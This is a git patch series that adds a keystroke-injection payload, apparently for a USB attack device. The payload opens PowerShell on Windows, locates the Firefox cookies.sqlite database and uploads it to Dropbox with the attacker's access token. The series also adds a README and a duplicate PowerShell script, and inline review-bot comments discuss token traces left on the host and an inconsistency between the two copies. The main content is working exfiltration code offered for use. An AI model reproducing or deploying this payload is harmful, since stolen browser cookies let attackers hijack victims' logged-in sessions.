From 83a25a18bfc38512b4afa0a5a050a63584ff6831 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 12:10:53 +0200
Subject: [PATCH 1/3] Export Firefox Cookies Database
---
.../Export_Cookies_From_Firefox/payload.txt | 54 +++++++++++++++++++
1 file changed, 54 insertions(+)
create mode 100644 payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
new file mode 100644
index 0000000..3ef6e5c
--- /dev/null
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
@@ -0,0 +1,54 @@
+REM ####################################################
+REM # |
+REM # Title : Export Firefox Cookies Database |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Exfiltration |
+REM # Target : Windows 10-11 |
+REM # |
+REM ####################################################
+
+
+REM Requirements:
+REM - Firefox must be installed
+
+
+REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
+DEFINE DROPBOX_ACCESS_TOKEN "example"
+
+
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 2000
+
+
+REM Get cookies DB path
+STRINGLN
+ $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
+ $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
+
+ $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
+
+END_STRINGLN
+
+REM Setting about exfiltration
+STRING $accessToken =
+STRING DROPBOX_ACCESS_TOKEN
+ENTER
+
+STRINGLN
+ $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+ $dropboxFilePath = "/cookies_exported.sqlite"
+
+ $headers = @{}
+ $headers.Add("Authorization", "Bearer $accessToken")
+ $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+ $headers.Add("Content-Type", "application/octet-stream")
+
+ Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;
+END_STRINGLN
From 8f689774768f29ae612b3cce33b76242df94d59f Mon Sep 17 00:00:00 2001
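Review bot: The header comments in payload.txt never say what the payload leaves behind on the machine it runs against, and the `DEFINE DROPBOX_ACCESS_TOKEN "example"` setting means a live bearer token is typed in cleartext into an interactive PowerShell window. Input typed there is normally kept in the PSReadLine history file and, where script block logging is enabled, in the PowerShell operational log, so the token stays recoverable by whoever examines the host afterwards. I would document that next to the DEFINE, for example `REM The token is typed in cleartext and persists in PowerShell history/logs on the target; use a token scoped to one app folder and revoke it after the test.` The same comment block could also list the two observable actions already in the script, the read of `cookies.sqlite` under `Mozilla\Firefox\Profiles\*default-release` and the POST to `content.dropboxapi.com`, so a reader knows what to look for.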
From: aleff-github
Date: Mon, 12 Jun 2023 12:11:40 +0200
Subject: [PATCH 2/3] readme
---
.../Export_Cookies_From_Firefox/README.md | 21 +++++++++++++++++++
.../Export_Cookies_From_Firefox/script.ps1 | 19 +++++++++++++++++
2 files changed, 40 insertions(+)
create mode 100644 payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md
create mode 100644 payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md
new file mode 100644
index 0000000..0b1850e
--- /dev/null
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md
@@ -0,0 +1,21 @@
+# Export Firefox Cookies Database
+
+This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken.
+
+**Category**: Exfiltration
+
+## Description
+
+This script may come in handy for those who want to quickly save all the cookies of their Firefox session by exporting the database via dropbox accesstoken.
+
+Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" at the end, then set your exfiltration settings i.e. Dropbox access token and so on... then export it, then close the powershell.
+
+## Dependencies
+
+* Firefox must be installed
+
+## Settings
+
+- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
+
+`DEFINE DROPBOX_ACCESS_TOKEN "example"`
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1 b/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1
new file mode 100644
index 0000000..1d15a29
--- /dev/null
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/script.ps1
@@ -0,0 +1,19 @@
+
+
+$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
+$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
+
+$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
+
+$accessToken = ""
+$authHeader = @{Authorization = "Bearer $accessToken"}
+$dropboxFilePath = "/cookies_exported.sqlite"
+
+$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+$headers = @{}
+$headers.Add("Authorization", "Bearer $accessToken")
+$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+$headers.Add("Content-Type", "application/octet-stream")
+
+Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent
From 30cf14a1c00937e4c39951164a9158f0a1342594 Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:29:47 -0400
Subject: [PATCH 3/3] Update payload.txt
---
.../Export_Cookies_From_Firefox/payload.txt | 17 +++++------------
1 file changed, 5 insertions(+), 12 deletions(-)
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
index 3ef6e5c..98bcbaa 100644
--- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
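Review bot: script.ps1 is a second copy of the commands that payload.txt types, and the two copies already disagree: this one passes `$fileContent` to `-Body` while payload.txt passes `$filePath`, and `$authHeader` is built here but never used. Nothing in the series says which file is authoritative or whether script.ps1 is meant to be run at all. I would remove the dead line `$authHeader = @{Authorization = "Bearer $accessToken"}` and open the file with a comment such as `# Reference copy of the PowerShell typed by payload.txt; reads cookies.sqlite from the default-release profile and uploads to content.dropboxapi.com`, or drop the duplicate so there is a single source to review.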
@@ -16,31 +16,24 @@ REM - Firefox must be installed REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. DEFINE DROPBOX_ACCESS_TOKEN "example" - -DELAY 1000 +DEFAULT_DELAY 500 GUI r -DELAY 500 -STRING powershell -DELAY 500 -ENTER +STRINGLN powershell DELAY 2000 REM Get cookies DB path -STRINGLN +STRINGLN_BLOCK $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles' $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"} - $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite' - END_STRINGLN REM Setting about exfiltration -STRING $accessToken = -STRING DROPBOX_ACCESS_TOKEN +STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN ENTER -STRINGLN +STRINGLN_BLOCK $uploadUrl = "https://content.dropboxapi.com/2/files/upload" $dropboxFilePath = "/cookies_exported.sqlite"